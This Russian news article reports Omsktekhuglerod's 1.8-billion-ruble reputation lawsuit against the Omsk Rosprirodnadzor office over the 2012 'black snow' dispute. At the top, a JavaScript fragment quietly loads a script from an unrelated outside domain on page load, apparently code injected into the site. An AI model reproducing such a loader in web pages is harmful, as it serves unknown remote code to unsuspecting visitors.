, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Сегодня: 15 августа, 2018 года
22 января, 2013 События

Валерий Каплунат предъявил двухмиллиардный иск Росприроднадзору

Валерий Каплунат предъявил двухмиллиардный иск Росприроднадзору не ради денег

Валерий Каплунат и Александр Щербаков

Неожиданное продолжение получил экологический скандал вокруг «черного снега» между ООО «Омсктехуглерод» и региональным Росприроднадзором. Подав в арбитражный суд иск о защите деловой репутации на рекордно большую сумму – 1,8 млрд рублей, председатель совета директоров «Омсктехуглерода» Валерий Каплунат заявил, что это было сделано не ради денег, а для того, чтобы «показать абсурдность ситуации и привлечь внимание общественности».

Напомним, что открытый конфликт между «Омсктехуглеродом» и региональным Росприроднадзором разгорелся из-за выпавшего в Омске 11 декабря 2012 года «черного снега». В список предполагаемых загрязнителей Росприроднадзор внес и «Омсктехуглерод». И хотя 17 декабря предприятие исключили из числа «подозреваемых» (позже было установлено, что это вина ТЭЦ-5. – Ред.), на этом дело не закончилось. Руководство «Омсктехуглерода» посчитало, что задета его репутация, и заявило, что надзорное ведомство знало о результатах анализа проб темно-серого вещества еще в день выбросов – 11 декабря, однако «незаконно и провокационно» скрывало эту информацию. Дело дошло до публичных обвинений. По словам представителя «Омсктехуглерода», руководитель регионального управления Росприроднадзора Александр Щербаков «проявил деструктивное, безответственное, непрофессиональное поведение, цинично пренебрег общественным мнением и фактически явился прямым соучастником экологического бедствия, постигшего город Омск». Кроме того, в «Омсктехуглероде» предположили коррупционный характер подобного поведения.

В ответ на это Управление Росприроднадзора по Омской области подало иск о защите деловой репутации к компании «Омсктехуглерод», при этом заявив, что предприятие является одним из злостных нарушителей природоохранного законодательства.

Сегодня, 22 января, стало известно, что ООО «Омсктехуглерод» также подало в суд иск о защите деловой репутации к региональному Роспироднадзору. Причем свой моральный ущерб предприятие оценило рекордно большой для Омска суммой в 1,8 млрд рублей.

Председатель совета директоров ООО «Омсктехуглерод» Валерий Каплунат пояснил «СуперОмску», что такой иск был подан не ради денег, а для того, чтобы поставить на место чиновников Росприроднадзора и привлечь к их деятельности внимание общественности.

«Не может, не имеет права этот чиновник заплевать нас. Сначала обвинить в том, что мы явились загрязнителями, на самом деле не являясь таковыми. А потом, в дальнейшем, просто навесить ярлык, что мы все равно злостные загрязнители. Мы должны сломать эту модель. Вот, собственно, вся цель нашего иска. Наша задача – привлечь внимание, создать хоть какой-то прецедент… И показать абсурдность сложившейся ситуации», – сказал Валерий Каплунат.

Узнать мнение руководителя регионального Росприроднадзора Александра Щербакова по этому вопросу пока не удалось.

«Все заместители отказались давать комментарии, а Александр Филиппович уже ушел, позвоните утром», – сказали в приемной регионального Росприроднадзора».

Справка:

ООО «Омсктехуглерод» одно из крупнейших предприятий, специализирующихся на выпуске технического углерода в мире, и крупнейшее в России. Продукция завода — технический углерод — широко применяется в шинной, резинотехнической, лакокрасочной промышленности, полиграфии, производстве полимеров и электрических кабелей. С 1992 года завод начал активно осваивать западный рынок. Сегодня большая часть продукции экспортируется на европейские предприятия. Среди потребителей заводы компаний: Michelin, Goodyear, Continental, Pirelli, Сибур.

В 2012 году на омской производственной площадке предприятия произведено 221,192 тыс. тонн техуглерода. Налоговые отчисления «Омсктехуглерода» в бюджеты различных уровней составляют около 1 млрд рублей в год.

Перейти к комментариям [ 0 ]

Свежие статьи из категории: События